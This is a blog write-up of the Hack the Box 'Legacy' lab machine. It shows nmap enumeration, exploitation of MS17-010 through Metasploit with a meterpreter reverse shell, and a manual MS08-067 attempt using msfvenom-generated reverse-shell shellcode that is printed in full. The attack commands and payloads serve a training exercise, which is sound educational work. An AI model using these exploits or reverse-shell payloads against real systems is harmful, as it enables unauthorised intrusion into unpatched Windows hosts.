Legacy

In this blog post, we take a look at the Legacy Windows machine on the “Hack the Box” platform. The writeup was completed on January 23rd, 2023 and highlights the importance of enumeration in penetration testing. By utilizing the –vuln script during the enumeration process, we were able to gather crucial information that ultimately led to a successful exploit. I had missed this step and was going into a rabbit hole chasing the wrong exploit. Additionally, it was noted that if the exploit repeatedly fails, resetting the machine on Hack the Box and trying again can be a helpful troubleshooting step.

Create Machine Working Directory

┌──(kali㉿kali)-[~]
└─$ mkdir HTB
┌──(kali㉿kali)-[~]
└─$ cd HTB
┌──(kali㉿kali)-[~/HTB]
└─$ mkdir Legacy
┌──(kali㉿kali)-[~/HTB]
└─$ cd Legacy
┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ 

Enumeration

I always use the following nmap flags after creating a directory with the Box name

└─$ nmap -sV -sC -oA nmap 10.10.10.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-22 02:58 EST
Nmap scan report for 10.10.10.4
Host is up (1.0s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE      VERSION
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows XP microsoft-ds
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 5d00h57m38s, deviation: 1h24m49s, median: 4d23h57m40s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 005056b9557f (VMware)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2023-01-27T11:58:31+02:00

Ports 139 and Ports 445 are open and running which is for NetBIOS and SMB. The Machine is likely a Windows XP machine as per the Nmap results

Ran an Nmap scan on port 139 and Port 445 against the –script vuln

kali@kali ~/H/Legacy> nmap -p 139,445 --script vuln 10.10.10.4
Starting Nmap 7.93 ( https://nmap.org ) at 2023-01-22 06:20 EST
Nmap scan report for 10.10.10.4
Host is up (0.43s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrar
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: EOF

Nmap done: 1 IP address (1 host up) scanned in 34.59 seconds

There is a vulnerability “Microsoft Windows system vulnerable to remote code execution (MS08-067)” and “Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)

Exploit – Option 1 – Metasploit

Did a search of both ms17-010 and MS08-067

msf6 > search ms08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/smb/ms08_067_netapi

msf6 > search ms17-010

Matching Modules
================

   #  Name                                      Disclosure Date  Rank     Check  Description
   -  ----                                      ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_psexec       2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   2  auxiliary/admin/smb/ms17_010_command      2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   3  auxiliary/scanner/smb/smb_ms17_010                         normal   No     MS17-010 SMB RCE Detection
   4  exploit/windows/smb/smb_doublepulsar_rce  2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution


Interact with a module by name or index. For example info 4, use 4 or use exploit/windows/smb/smb_doublepulsar_rce

Found some RCE modules for MS17_010 and after trying some of them, I found “exploit/windows/smb/ms17_010_psexec” to work. So I loaded the module

msf6 > use exploit/windows/smb/ms17_010_psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf6 exploit(windows/smb/ms17_010_psexec) > set LHOST 10.10.16.2
LHOST => 10.10.16.2
msf6 exploit(windows/smb/ms17_010_psexec) > show options

Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting           Required  Description
   ----                  ---------------           --------  -----------
   DBGTRACE              false                     yes       Show extra debug trace info
   LEAKATTEMPTS          99                        yes       How many times to try to leak transactio
                                                             n
   NAMEDPIPE                                       no        A named pipe that can be connected to (l
                                                             eave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-fr  yes       List of named pipes to check
                         amework/data/wordlists/n
                         amed_pipes.txt
   RHOSTS                10.10.10.4                yes       The target host(s), see https://github.c
                                                             om/rapid7/metasploit-framework/wiki/Usin
                                                             g-Metasploit
   RPORT                 445                       yes       The Target port (TCP)
   SERVICE_DESCRIPTION                             no        Service description to to be used on tar
                                                             get for pretty listing
   SERVICE_DISPLAY_NAME                            no        The service display name
   SERVICE_NAME                                    no        The service name
   SHARE                 ADMIN$                    yes       The share to connect to, can be an admin
                                                              share (ADMIN$,C$,...) or a normal read/
                                                             write folder share
   SMBDomain             .                         no        The Windows domain to use for authentica
                                                             tion
   SMBPass                                         no        The password for the specified username
   SMBUser                                         no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.16.2       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(windows/smb/ms17_010_psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp

My IP settings via Ifconfig

┌──(kali㉿kali)-[~]
└─$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:87:de:82:d0  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.248.128  netmask 255.255.255.0  broadcast 192.168.248.255
        inet6 fe80::d387:8bfe:48bc:4ce7  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:bc:43:f0  txqueuelen 1000  (Ethernet)
        RX packets 22031  bytes 3368402 (3.2 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 16822  bytes 3126743 (2.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 35  bytes 3412 (3.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 35  bytes 3412 (3.3 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.16.2  netmask 255.255.254.0  destination 10.10.16.2
        inet6 dead:beef:4::1000  prefixlen 64  scopeid 0x0<global>
        inet6 fe80::a36a:c939:bf36:c0ff  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 6125  bytes 1179643 (1.1 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 8403  bytes 1166432 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Run the exploit and got the meterpreter. Got both Root and User flags. Exploit completed

msf6 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.16.2:4444 
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -    [*] Preparing dynamite...
[*] 10.10.10.4:445 -            [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -    [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -    [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x8609b158
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... bZbjYAEN.exe
[*] 10.10.10.4:445 - Created \bZbjYAEN.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (175686 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \bZbjYAEN.exe...
[*] Meterpreter session 1 opened (10.10.16.2:4444 -> 10.10.10.4:1032) at 2023-01-22 15:48:28 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > searh -f root.txt
[-] Unknown command: searh
meterpreter > search -f root.txt
Found 1 result...
=================

Path                                                      Size (bytes)  Modified (UTC)
----                                                      ------------  --------------
c:\Documents and Settings\Administrator\Desktop\root.txt  32            2017-03-16 02:18:50 -0400

meterpreter > search -f user.txt
Found 1 result...
=================

Path                                             Size (bytes)  Modified (UTC)
----                                             ------------  --------------
c:\Documents and Settings\john\Desktop\user.txt  32            2017-03-16 02:19:49 -0400

meterpreter > 

Option 2 – Manual Method

After the nmap scan and the Vulnerability of MS08-067 and MS17-010, I did a search on searchsploit. I went with “windows/remote/7104.c” and added it to my working directory with the command “searchsploit -m windows/remote/7104.c”

└─$ searchsploit MS08-067             
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                                                                 |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)                                                                                                          | windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                                                                                                                           | windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                                                                                                                     | windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)                                                                                      | windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                                                                                                                 | windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                                                                                                                 | windows/remote/7132.py
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ searchsploit -m windows/remote/7104.c  
  Exploit: Microsoft Windows Server - Code Execution (MS08-067)
      URL: https://www.exploit-db.com/exploits/7104
     Path: /usr/share/exploitdb/exploits/windows/remote/7104.c
    Codes: OSVDB-49243, CVE-2008-4250, MS08-067
 Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/HTB/Legacy/7104.c

After trying to work with some of the exploits above with no luck, i found an exploit via reddit on the following link https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py. I did a Wget to get the code

┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
--2023-01-22 16:26:19--  https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12287 (12K) [text/plain]
Saving to: ‘ms08-067.py.1’

ms08-067.py.1                                        100%[===================================================================================================================>]  12.00K  --.-KB/s    in 0s      

2023-01-22 16:26:20 (24.8 MB/s) - ‘ms08-067.py.1’ saved [12287/12287]

                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ 

After going through the code , we have to create our own shellcode via msvenom for our machine and replace it on the code

┌──(kali㉿kali)-[~/HTB/Legacy]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.2 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
Found 11 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai failed with A valid opcode permutation could not be found.
Attempting to encode payload with 1 iterations of generic/none
generic/none failed with Encoding failed due to a bad character (index=3, char=0x00)
Attempting to encode payload with 1 iterations of x86/call4_dword_xor
x86/call4_dword_xor succeeded with size 348 (iteration=0)
x86/call4_dword_xor chosen with final size 348
Payload size: 348 bytes
Final size of c file: 1491 bytes
unsigned char buf[] = 
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x92\xf1\xf7\xc4\x83\xee\xfc\xe2\xf4\x6e\x19\x75\xc4"
"\x92\xf1\x97\x4d\x77\xc0\x37\xa0\x19\xa1\xc7\x4f\xc0\xfd"
"\x7c\x96\x86\x7a\x85\xec\x9d\x46\xbd\xe2\xa3\x0e\x5b\xf8"
"\xf3\x8d\xf5\xe8\xb2\x30\x38\xc9\x93\x36\x15\x36\xc0\xa6"
"\x7c\x96\x82\x7a\xbd\xf8\x19\xbd\xe6\xbc\x71\xb9\xf6\x15"
"\xc3\x7a\xae\xe4\x93\x22\x7c\x8d\x8a\x12\xcd\x8d\x19\xc5"
"\x7c\xc5\x44\xc0\x08\x68\x53\x3e\xfa\xc5\x55\xc9\x17\xb1"
"\x64\xf2\x8a\x3c\xa9\x8c\xd3\xb1\x76\xa9\x7c\x9c\xb6\xf0"
"\x24\xa2\x19\xfd\xbc\x4f\xca\xed\xf6\x17\x19\xf5\x7c\xc5"
"\x42\x78\xb3\xe0\xb6\xaa\xac\xa5\xcb\xab\xa6\x3b\x72\xae"
"\xa8\x9e\x19\xe3\x1c\x49\xcf\x99\xc4\xf6\x92\xf1\x9f\xb3"
"\xe1\xc3\xa8\x90\xfa\xbd\x80\xe2\x95\x0e\x22\x7c\x02\xf0"
"\xf7\xc4\xbb\x35\xa3\x94\xfa\xd8\x77\xaf\x92\x0e\x22\x94"
"\xc2\xa1\xa7\x84\xc2\xb1\xa7\xac\x78\xfe\x28\x24\x6d\x24"
"\x60\xae\x97\x99\xfd\xce\x82\xf3\x9f\xc6\x92\xf0\x4c\x4d"
"\x74\x9b\xe7\x92\xc5\x99\x6e\x61\xe6\x90\x08\x11\x17\x31"
"\x83\xc8\x6d\xbf\xff\xb1\x7e\x99\x07\x71\x30\xa7\x08\x11"
"\xfa\x92\x9a\xa0\x92\x78\x14\x93\xc5\xa6\xc6\x32\xf8\xe3"
"\xae\x92\x70\x0c\x91\x03\xd6\xd5\xcb\xc5\x93\x7c\xb3\xe0"
"\x82\x37\xf7\x80\xc6\xa1\xa1\x92\xc4\xb7\xa1\x8a\xc4\xa7"
"\xa4\x92\xfa\x88\x3b\xfb\x14\x0e\x22\x4d\x72\xbf\xa1\x82"
"\x6d\xc1\x9f\xcc\x15\xec\x97\x3b\x47\x4a\x17\xd9\xb8\xfb"
"\x9f\x62\x07\x4c\x6a\x3b\x47\xcd\xf1\xb8\x98\x71\x0c\x24"
"\xe7\xf4\x4c\x83\x81\x83\x98\xae\x92\xa2\x08\x11";

Replaced this on the code

# Reverse TCP to 192.168.119.204 port 62000:
shellcode=(
"\x31\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76"
"\x0e\x92\xf1\xf7\xc4\x83\xee\xfc\xe2\xf4\x6e\x19\x75\xc4"
"\x92\xf1\x97\x4d\x77\xc0\x37\xa0\x19\xa1\xc7\x4f\xc0\xfd"
"\x7c\x96\x86\x7a\x85\xec\x9d\x46\xbd\xe2\xa3\x0e\x5b\xf8"
"\xf3\x8d\xf5\xe8\xb2\x30\x38\xc9\x93\x36\x15\x36\xc0\xa6"
"\x7c\x96\x82\x7a\xbd\xf8\x19\xbd\xe6\xbc\x71\xb9\xf6\x15"
"\xc3\x7a\xae\xe4\x93\x22\x7c\x8d\x8a\x12\xcd\x8d\x19\xc5"
"\x7c\xc5\x44\xc0\x08\x68\x53\x3e\xfa\xc5\x55\xc9\x17\xb1"
"\x64\xf2\x8a\x3c\xa9\x8c\xd3\xb1\x76\xa9\x7c\x9c\xb6\xf0"
"\x24\xa2\x19\xfd\xbc\x4f\xca\xed\xf6\x17\x19\xf5\x7c\xc5"
"\x42\x78\xb3\xe0\xb6\xaa\xac\xa5\xcb\xab\xa6\x3b\x72\xae"
"\xa8\x9e\x19\xe3\x1c\x49\xcf\x99\xc4\xf6\x92\xf1\x9f\xb3"
"\xe1\xc3\xa8\x90\xfa\xbd\x80\xe2\x95\x0e\x22\x7c\x02\xf0"
"\xf7\xc4\xbb\x35\xa3\x94\xfa\xd8\x77\xaf\x92\x0e\x22\x94"
"\xc2\xa1\xa7\x84\xc2\xb1\xa7\xac\x78\xfe\x28\x24\x6d\x24"
"\x60\xae\x97\x99\xfd\xce\x82\xf3\x9f\xc6\x92\xf0\x4c\x4d"
"\x74\x9b\xe7\x92\xc5\x99\x6e\x61\xe6\x90\x08\x11\x17\x31"
"\x83\xc8\x6d\xbf\xff\xb1\x7e\x99\x07\x71\x30\xa7\x08\x11"
"\xfa\x92\x9a\xa0\x92\x78\x14\x93\xc5\xa6\xc6\x32\xf8\xe3"
"\xae\x92\x70\x0c\x91\x03\xd6\xd5\xcb\xc5\x93\x7c\xb3\xe0"
"\x82\x37\xf7\x80\xc6\xa1\xa1\x92\xc4\xb7\xa1\x8a\xc4\xa7"
"\xa4\x92\xfa\x88\x3b\xfb\x14\x0e\x22\x4d\x72\xbf\xa1\x82"
"\x6d\xc1\x9f\xcc\x15\xec\x97\x3b\x47\x4a\x17\xd9\xb8\xfb"
"\x9f\x62\x07\x4c\x6a\x3b\x47\xcd\xf1\xb8\x98\x71\x0c\x24"
"\xe7\xf4\x4c\x83\x81\x83\x98\xae\x92\xa2\x08\x11" 
)
# ------------------------------------------------------------------------

Setup an multihandler listener via metasploit

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set LHOST 10.10.16.2
LHOST => 10.10.16.2
msf6 exploit(multi/handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.16.2:443 


ms08-067.py.1 10.10.10.4 445 “

I tried a number of times to get the reverse shell but with failure and just as I was about to give up on this vector, I decided to reset the machine on Hack the box just incase it needed a refresh and then run the exploit again.